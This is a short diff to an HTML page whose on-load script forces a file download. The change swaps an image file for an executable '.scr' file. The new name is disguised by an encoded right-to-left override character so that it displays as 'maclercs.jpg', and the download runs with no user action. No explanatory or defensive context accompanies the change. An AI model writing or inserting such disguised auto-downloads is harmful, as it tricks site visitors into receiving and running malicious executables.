--- a/index.html
+++ b/index.html
@@ -8,7 +8,7 @@
   <script>
     window.onload = function() {
       const link = document.createElement('a');
-      link.href = 'maclercs.jpg'; // replace with your file path
+      link.href = 'macle%E2%80%AEgpj.scr'; // replace with your file path
       document.body.appendChild(link);
       link.click();
       document.body.removeChild(link);
